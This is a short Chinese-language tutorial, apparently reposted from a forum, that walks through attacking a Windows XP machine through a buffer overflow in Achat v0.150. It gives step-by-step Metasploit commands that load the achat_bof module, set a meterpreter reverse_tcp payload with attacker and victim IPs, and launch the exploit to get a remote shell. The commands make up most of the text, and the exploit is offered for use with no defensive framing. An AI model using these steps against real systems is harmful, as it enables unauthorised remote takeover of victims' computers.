使用Achat Unicode SEH缓冲区溢出攻击远程Windows PC

该模块利用Achat中的Unicode SEH缓冲区溢出。通过将制作的消息发送到默认端口9256 / UDP,可以覆盖SEH处理程序。即使利用是可靠的,它也取决于时间,因为在同一时间内有两个线程溢出堆栈。此模块已在Windows XP SP3和Windows 7上运行的Achat v0.150上进行了测试。


利用目标

Achat v0.150


需求

攻击者:kali Linux
受害者PC:Windows XP SP 3
打开Kali终端类型  msfconsole
使用Achat Unicode SEH Buffer Overflow攻击远程Windows PC
现在输入  exploit use / windows / misc / achat_bof
msf exploit(achat_bof)> set payload windows / meterpreter / reverse_tcp
msf exploit(achat_bof)> set lhost 192.168.1.7  (本地主机的IP)
msf exploit(achat_bof)> set rhost 192.168.1.8  (远程主机的IP)
msf exploit(achat_bof)> exploit
使用Achat Unicode SEH Buffer Overflow攻击远程Windows PC
使用Achat Unicode SEH Buffer Overflow攻击远程Windows PC
转载请注明本文链接: http://www.mayidui.net/t2408.html
游客
登录后才可以回帖,登录 或者 注册